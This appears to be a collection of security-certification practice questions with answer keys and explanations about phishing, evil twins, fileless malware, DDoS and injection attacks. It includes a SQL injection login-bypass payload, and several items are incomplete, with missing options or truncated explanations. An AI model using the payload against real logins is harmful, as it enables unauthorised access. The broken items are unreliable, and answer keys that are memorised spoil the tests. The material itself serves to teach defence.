A web service begins experiencing severe latency. Netflow shows thousands of short DNS queries leaving the attacker network, while a much larger volume of DNS responses is arriving at the victim’s public IP address from many open resolvers. Which attack is most likely occurring?
A.Replay attack using previously captured packets
B.DNS reflection and amplification denial-of-service attack
C.ARP poisoning that redirects local traffic on a LAN
D.Session hijacking through stolen authentication cookies
AnswerB
This is the best match. The attacker sends small DNS requests that cause open resolvers to send much larger responses to the victim's IP address. Because the victim receives the responses, the attack uses reflection; because the responses are much larger than the requests, it also uses amplification. The result is bandwidth exhaustion and severe latency, which are common symptoms of a volumetric DDoS attack.
Why this answer
The attack described is a DNS reflection and amplification denial-of-service attack. The attacker sends thousands of short DNS queries with a spoofed source IP (the victim's IP) to many open resolvers, which then send large DNS responses to the victim, overwhelming its bandwidth. NetFlow shows a small volume of queries leaving the attacker and a much larger volume of responses arriving at the victim, which is the hallmark of amplification (small request, large response) combined with reflection (responses from third-party resolvers).
Exam trap
The trap here is that candidates may confuse the high volume of responses arriving at the victim with a simple volumetric attack, missing the key indicators of reflection (responses from many different IPs) and amplification (small queries generating large responses), which uniquely identify a DNS reflection/amplification DDoS.
How to eliminate wrong answers
Option A is wrong because a replay attack involves capturing and retransmitting valid packets to impersonate a user or repeat a transaction, not generating massive traffic from open resolvers to a victim. Option C is wrong because ARP poisoning is a local network attack that manipulates ARP tables to intercept traffic on a LAN, not a volumetric DDoS attack using DNS over the internet. Option D is wrong because session hijacking through stolen cookies targets a user's authenticated session, not the network-level flooding of a victim with DNS responses.
Users in a warehouse report an SMS claiming a missed delivery. The link opens a login page that closely matches the company portal, and several users later receive unauthorized password reset emails. What attack is most likely?
A.Smishing, because the malicious lure is delivered through text messaging.
B.Vishing, because the attackers are likely trying to get a callback from the victims.
C.Spear phishing, because the message appears customized for warehouse employees.
D.Baiting, because the fake delivery notice tempts users to click for a reward.
AnswerA
Smishing is SMS-based phishing. The deceptive text message and fake portal are both strong indicators that the attacker is targeting users through mobile text communication.
Why this answer
The attack is smishing because the initial lure is delivered via SMS (Short Message Service), directing victims to a fraudulent login page. This aligns with the definition of smishing, a form of phishing that uses text messages to trick recipients into revealing sensitive information. The subsequent unauthorized password reset emails confirm credential compromise, which is the typical goal of smishing attacks.
Exam trap
CompTIA often tests the distinction between attack vectors (SMS vs. email vs. voice) rather than the content of the lure, so candidates may confuse smishing with spear phishing if they focus on the customized delivery notice instead of the delivery method.
How to eliminate wrong answers
Option B is wrong because vishing (voice phishing) relies on voice calls or voicemail prompts to elicit a callback, not an SMS with a link. Option C is wrong because spear phishing involves highly targeted, personalized emails, not SMS messages, and the scenario does not indicate the message was customized beyond a generic delivery notice. Option D is wrong because baiting involves offering a physical or digital lure (e.g., a free USB drive or download) to entice action, not a deceptive SMS link to a fake login page.
Employees in a lobby report that their phones automatically connected to a wireless network named "CorpWiFi." Soon after, they were prompted to sign in through a web page that did not look like the normal company portal. What attack is most likely?
A.Bluetooth pairing attack
B.Evil twin
C.NFC relay attack
D.MAC flooding
AnswerB
An evil twin is a rogue wireless access point that imitates a legitimate SSID so victims connect to it by mistake. The fake network name and suspicious sign-in page strongly suggest a malicious clone of the real Wi-Fi.
Why this answer
The scenario describes an evil twin attack, where a rogue access point (AP) broadcasts a SSID identical to the legitimate corporate network ("CorpWiFi"). When employees' devices automatically connect to the stronger signal of the rogue AP, they are served a fake captive portal designed to capture credentials or other sensitive data. This attack exploits the lack of mutual authentication in standard 802.11 Wi-Fi associations.
Exam trap
The trap here is that candidates may confuse an evil twin with a simple misconfiguration or a phishing attack, but the key indicator is the automatic connection to a network with the same SSID followed by a suspicious login page, which directly points to a rogue AP impersonating the legitimate network.
How to eliminate wrong answers
Option A is wrong because a Bluetooth pairing attack requires active pairing initiation and does not involve a web-based sign-in prompt or automatic Wi-Fi connection. Option C is wrong because an NFC relay attack extends the range of an NFC transaction (e.g., contactless payment) and does not create a fake Wi-Fi network or captive portal. Option D is wrong because MAC flooding is a Layer 2 attack that floods a switch's CAM table to force it into hub mode, enabling packet sniffing; it does not involve a rogue wireless network or a sign-in page.
During a conference, several employees connect to a wireless network named the same as the hotel's guest Wi-Fi. Shortly after connecting, they receive certificate warnings when accessing the company portal, and packet capture shows a nearby laptop advertising the same SSID and relaying traffic. What type of attack is most likely?
A.Rogue access point or evil twin attack, because a fake wireless network impersonates a legitimate one.
B.Replay attack, because previously captured wireless frames are being resent to the network.
C.DNS poisoning, because users are being sent to the wrong website through altered name resolution.
D.Denial of service, because users are simply unable to connect reliably.
AnswerA
An evil twin duplicates the SSID of a trusted network to lure clients into connecting to an attacker-controlled access point.
Why this answer
The attack described is an evil twin (a type of rogue access point) because the attacker sets up a laptop broadcasting the same SSID as the hotel's legitimate guest Wi-Fi. When employees connect to this fake network, the attacker can intercept traffic and present a fraudulent certificate for the company portal, triggering certificate warnings. The packet capture confirming the laptop is relaying traffic proves it is acting as a man-in-the-middle, not merely a passive listener.
Exam trap
The trap here is that candidates confuse an evil twin with a simple rogue access point, but the key differentiator is that the evil twin specifically impersonates a legitimate SSID to trick users, while a rogue AP might use a different SSID; the certificate warning and relayed traffic confirm the man-in-the-middle role, not just unauthorized access.
How to eliminate wrong answers
Option B is wrong because a replay attack involves capturing and retransmitting valid wireless frames (e.g., authentication or data packets) to impersonate a user or gain unauthorized access, but here the attacker is actively advertising a fake SSID and relaying live traffic, not replaying old frames. Option C is wrong because DNS poisoning alters DNS resolution to redirect users to a malicious site, but the scenario describes certificate warnings on the company portal and a laptop relaying traffic, not a manipulated DNS response. Option D is wrong because a denial of service attack would prevent connectivity or degrade performance, whereas users are successfully connecting to the fake network and receiving certificate warnings, indicating active interception rather than service disruption.
A SOC analyst investigates a host after an employee opens an invoice attachment. The endpoint shows PowerShell running in a hidden window, no new executable files are created on disk, and the same suspicious activity returns after a reboot. What is the most likely attack type?
A.Fileless attack, because the malicious activity is operating primarily in memory and using native tools.
B.Ransomware, because the user opened an email attachment.
C.Worm, because PowerShell is a common scripting tool.
D.Rootkit, because the attacker is hiding the process from normal tools.
AnswerA
Fileless attacks rely on legitimate scripting engines and memory-resident techniques instead of dropping obvious executable files. Hidden PowerShell activity, repeated behavior after reboot, and the absence of a new binary are strong signs that the attacker is leveraging trusted operating system components. This approach often helps malware evade traditional file-based scanning while still achieving persistence or command execution.
Why this answer
The correct answer is A because the attack is fileless: it runs PowerShell in a hidden window without writing new executables to disk, and persistence after reboot indicates the malicious code is stored in the registry or a script that loads into memory at startup. Fileless attacks leverage native tools like PowerShell, WMI, or .NET to execute payloads entirely in memory, bypassing traditional file-based detection.
Exam trap
The trap here is that candidates confuse 'fileless' with 'no persistence' or assume any attachment-based attack is ransomware, but the key indicators—hidden PowerShell, no new executables, and post-reboot persistence—point directly to a fileless attack using native Windows tools.
How to eliminate wrong answers
Option B is wrong because ransomware typically encrypts files and demands payment, but the scenario describes no encryption, no ransom note, and no new executables—only persistent in-memory PowerShell activity. Option C is wrong because a worm self-replicates across networks without user interaction, while this attack requires the user to open an invoice attachment and shows no lateral movement or self-propagation.
An employee receives a text message saying their payroll account is locked and asks them to tap a link and enter a one-time passcode. What type of attack is this?
A.Phishing
B.Smishing
C.Vishing
D.Baiting
AnswerB
Smishing is phishing delivered by SMS or another text messaging service. The attacker uses urgency and a fake account-lock message to trick the user into clicking a malicious link and giving away a one-time code.
Why this answer
Smishing (SMS phishing) is the correct classification because the attack vector is a text message (SMS) that lures the recipient into tapping a link and entering a one-time passcode. Unlike generic phishing which uses email, smishing specifically exploits SMS trust and the limited screen real estate of mobile devices to bypass security awareness.
Exam trap
The trap here is that candidates confuse smishing with generic phishing because both involve a link and credential theft, but the exam specifically tests the delivery method (SMS vs. email) as the distinguishing factor.
How to eliminate wrong answers
Option A (Phishing) is wrong because phishing specifically refers to email-based social engineering, not SMS/text messaging. Option C (Vishing) is wrong because vishing uses voice calls or voicemail, not text messages. Option D (Baiting) is wrong because baiting involves offering a physical or digital lure (e.g., a free USB drive or download) to trick the victim, not a direct message requesting credentials.
A SOC analyst reviews a suspicious email about an overdue invoice. The display name matches a known supplier, but the envelope sender is from a free webmail domain, and the Reply-To address uses a look-alike domain with one swapped letter. The message also includes a company logo and a PDF attachment. Which two findings are the strongest indicators of a phishing attempt? Select two.
Select 2 answers
A.The display name matches the supplier, but the envelope sender is from a free webmail provider.
B.The message was transmitted over TLS to the recipient's mail gateway.
C.The Reply-To address uses a look-alike domain with one swapped letter in the brand name.
D.The email contains a PDF invoice attachment with a normal business filename.
E.The message includes the supplier's logo and a standard-looking signature block.
AnswersA, C
A familiar display name can be copied easily, so it is not trustworthy by itself. An envelope sender using a free webmail provider is inconsistent with a legitimate supplier invoice workflow and strongly suggests impersonation. Attackers often rely on this mismatch to bypass casual review while making the message appear routine.
Why this answer
Option A is correct because the envelope sender (the actual origin address in the SMTP MAIL FROM command) being from a free webmail domain while the display name matches a known supplier is a classic phishing red flag. Legitimate business invoices are almost never sent from free webmail providers like Gmail or Yahoo, as organizations use their own domains for official correspondence. This mismatch between the visible display name and the actual sender address indicates spoofing.
Exam trap
CompTIA often tests the distinction between the visible display name and the actual envelope sender, as candidates may mistakenly focus on the attachment or logo as phishing indicators rather than the sender address mismatch.
Which four of the following are common indicators of a phishing attack? (Choose four.)
Select 4 answers
.Urgent or threatening language demanding immediate action
.Spoofed sender email address that mimics a legitimate domain
.Unsolicited attachment or link that prompts credential entry
.Presence of a digital signature from a trusted certificate authority
.Grammatical errors and poor formatting in the message body
.A request for sensitive information via a secure web portal
Why this answer
These four options are correct because they represent classic hallmarks of phishing attacks. Urgent or threatening language is a social engineering tactic to bypass rational thought. Spoofed sender addresses exploit trust in familiar domains.
Unsolicited attachments or links are the primary delivery mechanism for phishing payloads. Grammatical errors and poor formatting often indicate a lack of professional quality control typical of legitimate organizations.
Exam trap
Cisco often tests the misconception that technical security features like digital signatures or HTTPS encryption automatically indicate legitimacy, when in fact attackers can obtain valid certificates or bypass signature verification through social engineering.
A web login form returns access after a tester enters `' OR '1'='1'--` into the username field. What type of attack is this?
A.Cross-site scripting
B.SQL injection
C.Session hijacking
D.Insecure deserialization
AnswerB
SQL injection happens when attacker input changes the meaning of a database query. The payload forces the login check to evaluate as true, which can bypass authentication.
Why this answer
The input `' OR '1'='1'--` is a classic SQL injection payload that manipulates the SQL query logic. By injecting a single quote to break out of the string context, the `OR '1'='1'` condition makes the WHERE clause always true, and the `--` comments out the rest of the query. This bypasses authentication because the database returns a valid row, granting access without a correct password.
Exam trap
The trap here is that candidates may confuse SQL injection with cross-site scripting because both involve injecting malicious input, but SQL injection targets the database layer via SQL syntax, while XSS targets the browser via HTML/JavaScript.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting client-side scripts (e.g., JavaScript) into web pages viewed by other users, not manipulating database queries to bypass authentication. Option C is wrong because session hijacking involves stealing or predicting a valid session token (e.g., via packet sniffing or session fixation) to impersonate an authenticated user, not altering the login query logic.
An accounts payable clerk receives an email that continues a real vendor conversation from last week. The sender domain is only one character different from the vendor's real address. The message says the invoice is overdue and asks the clerk to update the payment account before the end of the day. What is the best next action?
A.Reply to the email asking for confirmation of the new bank details.
B.Verify the request using a known phone number or portal from previous records before taking action.
C.Forward the email to the vendor's entire contact list to warn them immediately.
D.Open the attached invoice to check whether the payment information matches past records.
AnswerB
Using a known out-of-band contact method confirms whether the request is legitimate without trusting the suspicious email path.
Why this answer
Option B is correct because the email exhibits classic signs of a business email compromise (BEC) attack: a spoofed sender domain (typosquatting) and urgent payment redirection. The best next action is to verify the request out-of-band using a trusted phone number or portal from previous records, as this bypasses any compromised email channels and confirms the legitimacy of the request before any financial loss occurs.
Exam trap
The trap here is that candidates may think opening the attachment to check payment details is a safe verification step, but in reality, attachments in phishing emails are a common vector for malware delivery, and the correct action is always to verify through a trusted, independent channel.
How to eliminate wrong answers
Option A is wrong because replying to the email could reach the attacker if the sender domain is spoofed or the account is compromised, and asking for confirmation via email does not provide any security verification. Option C is wrong because forwarding the email to the vendor's entire contact list could spread phishing links or malware, and it may cause unnecessary panic or further compromise other recipients. Option D is wrong because opening the attached invoice could execute malware or lead to credential harvesting, and checking payment information against past records does not verify the authenticity of the sender or the request.
A security analyst receives an alert from the email security gateway about a message sent to an employee. The email has an attachment named 'Invoice_Q4_2024.exe'. The employee claims they did not open the attachment, and the email appears to come from a known vendor's domain but the sender address has a slight typo. Which type of attack is most likely being attempted?
A.Spear phishing
B.Phishing
C.Smishing
D.Vishing
AnswerB
Phishing is a social engineering attack that uses deceptive emails and malicious attachments to trick recipients into executing malware or revealing sensitive information. The typo-squatted sender address and executable attachment are classic indicators of a phishing attempt.
Why this answer
The email contains a malicious executable attachment ('Invoice_Q4_2024.exe') and uses a spoofed sender address with a typo to impersonate a known vendor. This is a classic phishing attack because it is a broad, unsolicited attempt to trick the recipient into executing malware, without any personalized targeting beyond the generic invoice lure. The slight typo in the sender domain indicates domain spoofing, a common phishing technique that exploits the lack of SPF/DKIM validation.
Exam trap
CompTIA often tests the distinction between phishing and spear phishing by including a generic lure (like 'Invoice_Q4_2024.exe') that lacks personalization, which immediately disqualifies spear phishing even if the sender appears to be a known entity.
How to eliminate wrong answers
Option A is wrong because spear phishing requires the attacker to research and personalize the message for a specific individual or role, whereas this email uses a generic 'Invoice' subject line and attachment name, indicating a mass-distributed campaign. Option C is wrong because smishing (SMS phishing) uses text messages (SMS) as the attack vector, not email with an executable attachment. Option D is wrong because vishing (voice phishing) uses phone calls or voicemail to deceive victims, not email attachments.
A SOC analyst sees many login attempts against one SaaS account from hundreds of IPs over 20 minutes. Most passwords are valid-looking, but only a few result in successful logons, and the successful attempts use a password pattern that was exposed in a public breach list. What is the best mitigation to reduce this attack?
C.Disable account lockouts to avoid user inconvenience.
D.Allow unlimited retries so legitimate users are never blocked.
AnswerB
This attack is consistent with credential stuffing, where attackers reuse passwords taken from prior breaches across many accounts. Breached-password screening helps stop users from choosing known-compromised passwords, and MFA adds a second barrier if a password is guessed or reused. Together, these controls reduce the chance that stolen credentials will work at scale. The scenario's pattern of many IPs and a small number of successful logins is exactly the kind of activity these controls are meant to disrupt.
Why this answer
Option B is correct because the attack uses passwords from a public breach list, so breached-password screening would block those known compromised passwords. Additionally, MFA would stop the attacker even if they use a valid breached password, as they lack the second factor. This combination directly addresses the two key weaknesses: reused breached passwords and the lack of additional authentication.
Exam trap
The trap here is that candidates often focus on preventing brute-force attempts (e.g., lockouts) rather than recognizing that the attack uses valid breached passwords, making password screening and MFA the correct defense.
How to eliminate wrong answers
Option A is wrong because increasing password length requirements does not prevent the use of passwords that are already exposed in a breach list; attackers can still use long but compromised passwords. Option C is wrong because disabling account lockouts would allow the attacker to continue brute-force attempts indefinitely without triggering any defense, increasing the risk of successful logons.
A firewall analyst reviews logs and sees one external IP address sending connection attempts to TCP ports 22, 80, 139, 445, and 3389 on dozens of internal hosts every few seconds. No payloads are delivered and no sessions are established. What is the most likely activity?
A.Port scanning, because the source is systematically probing many ports and hosts for exposed services.
B.Reflection-based denial-of-service, because the attacker is using third-party systems to amplify traffic.
C.Man-in-the-middle, because the attacker is intercepting communications between internal hosts.
D.Protocol abuse, because the attacker is sending malformed traffic to crash services.
AnswerA
This is a classic port scanning pattern. The attacker is checking multiple ports across many systems with short, repeated attempts and no real session establishment. That behavior is consistent with reconnaissance before exploitation.
Why this answer
The observed behavior—a single external IP sending connection attempts to multiple TCP ports (22, 80, 139, 445, 3389) across many internal hosts at regular intervals—is the hallmark of a port scan. The absence of payload delivery or session establishment confirms the attacker is only probing for open services, not attempting exploitation or data transfer. This matches the definition of a reconnaissance activity, specifically a horizontal port scan targeting common service ports.
Exam trap
The trap here is that candidates may confuse a port scan with a denial-of-service attack because of the high frequency of connection attempts, but the key distinction is that no sessions are established and no payloads are delivered, which rules out DoS and exploitation.
How to eliminate wrong answers
Option B is wrong because reflection-based denial-of-service (e.g., NTP amplification) relies on spoofed source IPs and large response payloads from third-party servers, not direct connection attempts from a single external IP with no sessions established. Option C is wrong because man-in-the-middle attacks require the attacker to position themselves between communicating hosts (e.g., via ARP spoofing or rogue access points), not to send unsolicited connection probes from an external address. Option D is wrong because protocol abuse involves sending malformed or non-compliant traffic to trigger crashes or vulnerabilities, whereas this traffic is standard TCP SYN packets with no payload, and no sessions are established to deliver malformed data.
An employee gets a text message saying their mobile carrier will suspend service unless they tap a link and verify their account details. What type of attack is this?
A.Smishing, because the attacker is using SMS messages to trick the user
B.Vishing, because the attacker is using a voice call to pressure the user
C.Baiting, because the attacker is offering a free service upgrade
D.Tailgating, because the attacker is trying to enter a building behind someone else
AnswerA
Smishing is phishing delivered through text messages, often with urgent account or delivery claims.
Why this answer
This is smishing because the attacker uses SMS (Short Message Service) as the delivery vector to send a fraudulent message that tricks the recipient into clicking a malicious link. Smishing is a form of social engineering that exploits the trust users place in text-based communications from known entities like mobile carriers, often leading to credential theft or malware installation.
Exam trap
The trap here is that candidates may confuse smishing with vishing because both involve phishing via telecommunications, but the key differentiator is the medium: SMS (text) versus voice call.
How to eliminate wrong answers
Option B is wrong because vishing (voice phishing) relies on voice calls, not SMS text messages, to deceive the victim. Option C is wrong because baiting involves offering something enticing (e.g., a free download or USB drive) to lure the victim into an action, not sending a threatening SMS about service suspension. Option D is wrong because tailgating is a physical security attack where an unauthorized person follows an authorized individual into a restricted area, which has no relation to SMS-based deception.
A developer wants to reduce the risk of SQL injection in a new customer search form. Which two changes are the best mitigations? Select two.
Select 2 answers
A.Use parameterized queries or prepared statements for all database access.
B.Validate and constrain user input before it reaches the database layer.
C.Store the database password in the page source so the app can connect faster.
D.Disable TLS so the application can inspect requests more easily.
E.Allow the application to build SQL statements by concatenating raw user input.
AnswersA, B
Parameterized queries keep user input separate from the SQL command structure, which blocks injection attacks effectively.
Why this answer
Option A is correct because parameterized queries and prepared statements separate SQL logic from user-supplied data, ensuring that input is treated as a literal value rather than executable code. This prevents attackers from injecting malicious SQL commands into the query string, as the database driver automatically escapes or binds parameters safely. This is the most effective defense against SQL injection attacks.
Exam trap
The trap here is that candidates may think input validation alone is sufficient, but the exam emphasizes that parameterized queries are the definitive mitigation, while validation is a secondary defense-in-depth layer.
Based on the exhibit, what is the MOST likely activity taking place on the network?
A user opened a spreadsheet shortly before unusual internal connection patterns began. The same account is now authenticating to many hosts in rapid succession.
A.A worm is flooding the network with broadcast traffic and exhausting bandwidth.
B.An attacker is performing lateral movement using stolen credentials and remote administration tools.
C.A malicious insider is exfiltrating data through a cloud sync application.
D.A misconfigured printer is repeatedly scanning the subnet for available services.
AnswerB
The mix of SMB, WinRM, remote logons, Kerberos activity, and PsExec service creation is consistent with movement from one compromised workstation to multiple internal hosts.
Why this answer
The exhibit shows a user opening a spreadsheet (likely a phishing vector) followed by rapid authentication attempts from the same account to many hosts. This pattern matches lateral movement using stolen credentials, where an attacker uses remote administration tools like PsExec, WinRM, or RDP to move across the network after initial compromise.
Exam trap
The trap here is confusing lateral movement with network scanning or data exfiltration; candidates often overlook that the same account authenticating to many hosts is a hallmark of credential-based lateral movement, not a misconfiguration or worm.
How to eliminate wrong answers
Option A is wrong because a worm flooding broadcast traffic would generate excessive broadcast packets (e.g., ARP or ICMP floods), not sequential authentication events to specific hosts. Option C is wrong because data exfiltration via cloud sync would show outbound traffic to cloud storage APIs, not internal authentication bursts. Option D is wrong because a misconfigured printer scanning the subnet would use protocols like SNMP or mDNS discovery, not repeated authentication attempts with the same user account.
An endpoint investigation shows winword.exe launching powershell.exe with -nop -w hidden -enc arguments. The same host also has a newly created WMI permanent event subscription, and no new executable has appeared in Downloads or Program Files. Which two findings are most consistent with a fileless compromise and persistence mechanism? Select two.
Select 2 answers
A.PowerShell was launched with encoded, hidden execution arguments from a document process.
B.A WMI permanent event subscription was created under the root\subscription namespace.
C.A new executable named updater.exe was copied into Program Files by an administrator.
D.The browser cache was cleared after a routine user sign-out.
E.A signed video driver updated successfully through Windows Update.
AnswersA, B
Encoded and hidden PowerShell launched from a document process is a strong fileless malware indicator. The attack uses built-in scripting rather than dropping a traditional executable, which helps evade file-based detections. In combination with a user-facing process like Word, this pattern commonly suggests initial execution through malicious content or macro abuse.
Why this answer
Option A is correct because the use of winword.exe to launch powershell.exe with `-nop -w hidden -enc` arguments is a classic fileless execution technique. The encoded command runs entirely in memory without writing a payload to disk, and the launch from a document process (winword.exe) indicates a macro or exploit-based initial access, consistent with a fileless compromise.
Exam trap
The trap here is that candidates may think any persistence mechanism (like a new executable in Program Files) is fileless, but fileless specifically means no executable written to disk, and WMI subscriptions are a common fileless persistence vector.
After a user installs a free PDF converter from an unofficial website, the laptop starts making periodic outbound connections to an unknown server, the browser homepage changes, and a new program launches at logon. What is the most likely malware type?
A.Worm
B.Trojan
C.Rootkit
D.Ransomware
AnswerB
This is the best answer because the malicious software was disguised as a useful free tool. The symptoms include persistence, browser changes, and communication with an unknown server, which are common signs of a trojan payload. Trojans often arrive through deceptive downloads and then install additional harmful behavior after execution.
Why this answer
The user downloaded and installed a program that appears legitimate (a PDF converter) but performs malicious actions: making outbound connections, changing browser settings, and adding a startup program. This is the classic behavior of a Trojan horse, which disguises itself as useful software to trick users into installing it, then executes hidden malicious functions. Unlike worms, Trojans do not self-replicate, and unlike ransomware or rootkits, the described symptoms focus on unauthorized remote access and persistence rather than file encryption or deep OS concealment.
Exam trap
The trap here is that candidates may confuse the self-replicating behavior of a worm with the user-initiated installation of a Trojan, or mistake the visible symptoms (browser change, startup entry) for a rootkit's stealth, when in fact Trojans often exhibit overt persistence mechanisms to maintain access.
How to eliminate wrong answers
Option A is wrong because a worm self-replicates and spreads across networks without user interaction, whereas this infection required the user to manually install a program. Option C is wrong because a rootkit is designed to hide its presence and maintain privileged access by subverting OS-level detection mechanisms, not to change browser homepages or add visible startup entries. Option D is wrong because ransomware typically encrypts files and demands payment, displaying a ransom note, whereas the described symptoms involve outbound connections and browser changes without file encryption or extortion.
A finance team receives emails that appear to come from the CEO's assistant and ask them to review a document. Several users entered their passwords on a fake login page, and the attackers then signed in from a new country using the same credentials. Which control most directly reduces successful account takeover if a password is stolen?
A.Require password changes every 30 days for all users.
B.Use phishing-resistant MFA such as FIDO2 or WebAuthn.
C.Turn off all external email to eliminate the chance of future messages.
D.Use single sign-on without MFA so users authenticate only once.
AnswerB
Phishing-resistant multifactor authentication is the strongest choice here because it prevents a stolen password from being enough to log in. The attacker already harvested credentials through a fake login page, so a second factor that cannot be easily replayed from another site directly disrupts the attack path. FIDO2 or WebAuthn reduces the value of captured passwords and helps stop account takeover even when users are deceived by convincing impersonation emails. This is a practical defense against credential phishing and replay.
Why this answer
Phishing-resistant MFA, such as FIDO2 or WebAuthn, directly prevents account takeover even when a password is stolen because these methods use public-key cryptography and origin-bound credentials. The fake login page cannot intercept the private key or replay the authentication, so the attacker cannot sign in from a new country despite having the password.
Exam trap
The trap here is that candidates often choose password rotation (Option A) as a security best practice, but the question specifically asks for the control that most directly reduces successful account takeover when a password is already stolen, which is phishing-resistant MFA, not password aging.
How to eliminate wrong answers
Option A is wrong because requiring password changes every 30 days does not prevent an attacker from using a stolen password immediately; it only reduces the window of exposure after the fact, and frequent changes can actually encourage weaker passwords. Option C is wrong because turning off all external email is an impractical and overly restrictive measure that does not address the core issue of credential theft; attackers could still use other vectors like internal phishing or compromised accounts. Option D is wrong because single sign-on without MFA consolidates authentication to a single point of failure; if the password is stolen, the attacker gains access to all linked systems without additional barriers.
A development team wants to allow users to search orders by customer name and date range. Logs show the team currently concatenates the filter values into SQL strings. Which change best reduces SQL injection risk without removing the search feature?
A.Escape apostrophes in the input before building the SQL statement.
B.Use parameterized queries or prepared statements for the search filters.
C.Disable database error messages so attackers cannot see query details.
D.Place the application behind a VPN so only internal users can run searches.
AnswerB
Parameterized queries separate code from data, so user input is treated as values rather than executable SQL. This allows the search function to remain flexible while dramatically reducing injection risk. Prepared statements are the preferred fix because they address the root cause instead of relying on brittle string handling.
Why this answer
Option B is correct because parameterized queries (also known as prepared statements) separate SQL logic from user data by sending the query structure and parameters independently to the database. This ensures that user-supplied filter values are always treated as data, never as executable SQL code, which completely prevents SQL injection even if the input contains malicious characters like apostrophes or SQL keywords.
Exam trap
The trap here is that candidates often choose input escaping (Option A) because it seems like a direct fix for the apostrophe problem, but they fail to recognize that parameterized queries are the only comprehensive defense that eliminates the entire class of SQL injection vulnerabilities regardless of input format.
How to eliminate wrong answers
Option A is wrong because escaping apostrophes alone does not protect against all SQL injection vectors, such as numeric fields, stacked queries, or time-based blind injection, and escaping can be bypassed if not done consistently or if the database uses a different escape character. Option C is wrong because disabling database error messages only hides error details from attackers; it does not prevent the injection itself, and an attacker can still exploit the vulnerability using blind SQL injection techniques. Option D is wrong because placing the application behind a VPN does not address the root cause of SQL injection; it only restricts network access, and the vulnerability remains exploitable by any authenticated user who can reach the application.
A finance laptop is opened to review an invoice attachment. EDR then shows winword.exe launching powershell.exe with hidden, no-profile, and base64-encoded arguments. No executable is written to disk, network beacons begin from memory, and after a reboot the activity disappears unless the document is opened again. What type of malware behavior is most likely?
A.Worm behavior, because the infection would self-replicate across systems through the network.
B.Fileless attack, because malicious code runs in memory and leaves little or no executable artifact on disk.
C.Rootkit behavior, because the malware is hidden from normal user-mode tools.
D.Ransomware, because the user opened an invoice attachment before the suspicious activity started.
AnswerB
This is a classic fileless attack pattern. The process chain from a trusted Office app to hidden PowerShell, the encoded command line, the lack of a new binary on disk, and the disappearance after reboot all point to code executing primarily in memory. That makes detection harder and often means the initial document or script acts as the launcher rather than a traditional dropper.
Why this answer
The scenario describes malicious code that executes entirely in memory without writing an executable to disk, which is the defining characteristic of a fileless attack. Winword.exe launching PowerShell with hidden, no-profile, and base64-encoded arguments is a classic technique to load and execute payloads directly in memory, bypassing traditional file-based detection. The fact that activity disappears after reboot unless the document is reopened confirms that no persistent artifact remains on disk, further supporting fileless behavior.
Exam trap
The trap here is that candidates may confuse the initial infection vector (opening an invoice) with the malware type (ransomware), but the key behavioral indicator is the in-memory execution and lack of disk artifacts, which points to fileless malware, not ransomware.
How to eliminate wrong answers
Option A is wrong because worm behavior requires self-replication across systems via network propagation, and there is no evidence of lateral movement or self-copying in this scenario. Option C is wrong because rootkit behavior involves hiding processes, files, or registry keys from the operating system, typically by intercepting system calls, whereas this attack runs in user-mode memory without hiding its presence from EDR. Option D is wrong because ransomware would typically encrypt files and demand payment, but the description only shows beaconing and no file encryption or ransom note, so the invoice attachment is merely the initial vector, not the malware type.
Based on the exhibit, what vulnerability is the application most likely suffering from?
A.Stored cross-site scripting, because attacker-controlled script is saved and later rendered to other users.
B.Command injection, because the script attempts to send cookies to a remote host.
C.Session fixation, because users saw the same review page after posting.
D.Insecure deserialization, because the payload is embedded in a review field.
AnswerA
Stored cross-site scripting is correct because the malicious script was submitted once, saved by the application, and then executed for other visitors when the review was displayed. The evidence of requests to the attacker domain confirms that the browser executed the injected script and exposed user data.
Why this answer
The application stores user-supplied input in a review field and later renders it to other users without proper sanitization. The exhibit shows a script tag attempting to exfiltrate cookies to a remote host, which is a classic stored cross-site scripting (XSS) payload. Because the malicious script is persisted on the server and executed in the browsers of subsequent visitors, the vulnerability is stored XSS.
Exam trap
CompTIA often tests the distinction between stored XSS and reflected XSS, where candidates may confuse the persistence of the payload (stored) with the immediate reflection of input (reflected), or they may incorrectly associate cookie exfiltration with command injection rather than client-side scripting.
How to eliminate wrong answers
Option B is wrong because command injection involves injecting operating system commands into a server-side process (e.g., via shell metacharacters like `;` or `|`), not sending cookies via JavaScript; the script's behavior of exfiltrating cookies is a client-side action, not server-side command execution. Option C is wrong because session fixation requires an attacker to force a known session ID on a user before login, and the scenario describes a review page being displayed after posting, which is unrelated to session ID manipulation. Option D is wrong because insecure deserialization exploits the deserialization of untrusted data objects (e.g., PHP or Java serialized objects) to execute arbitrary code, whereas the payload here is a simple script tag embedded in a text field, not a serialized object.
A public website is overwhelmed by a flood of DNS responses arriving from many open resolvers after the attacker sends small forged queries to those resolvers. The target bandwidth is saturated and the source IPs vary widely. What kind of attack is being used?
DNS amplification uses small spoofed requests to trigger much larger replies from reflectors, multiplying traffic toward the victim.
Why this answer
B is correct because this scenario describes a DNS amplification DDoS attack. The attacker sends small forged DNS queries with a spoofed source IP (the victim's IP) to open resolvers, which respond with much larger DNS replies. The flood of amplified responses saturates the victim's bandwidth, and the varying source IPs make mitigation difficult.
This matches the description of a reflection/amplification attack using DNS.
Exam trap
The trap here is confusing a DNS amplification attack with a SYN flood because both involve flooding, but the key differentiator is the use of DNS responses from open resolvers versus incomplete TCP handshakes.
How to eliminate wrong answers
Option A is wrong because a SYN flood targets the TCP three-way handshake by sending many SYN packets without completing the handshake, exhausting server resources; it does not involve DNS responses or open resolvers. Option C is wrong because a replay attack involves capturing and retransmitting valid data transmissions (e.g., authentication tokens) to trick a system; it does not use DNS queries or bandwidth saturation.
Based on the exhibit, what type of malware is most likely present?
A.Ransomware, because the files are being renamed and recovery copies are being deleted.
B.Adware, because documents are no longer opening correctly.
C.Rootkit, because the system is using a command-line utility.
D.Spyware, because the attacker wants to read user documents.
AnswerA
The combination of shadow copy deletion, mass file renaming, and a ransom note is a strong match for ransomware. The attacker is attempting to prevent recovery while demanding payment or coercing the victim, which is exactly the pattern shown in the exhibit.
Why this answer
The exhibit shows files being renamed with a new extension and recovery copies (shadow copies) being deleted via vssadmin.exe. This is a classic ransomware behavior: encrypting user files and removing Volume Shadow Copy backups to prevent recovery without the attacker's key. Ransomware specifically targets document files and system restore points to maximize extortion leverage.
Exam trap
The trap here is that candidates see 'command-line utility' and think rootkit, but vssadmin deletion is a hallmark of ransomware, not a rootkit's stealth or persistence mechanism.
How to eliminate wrong answers
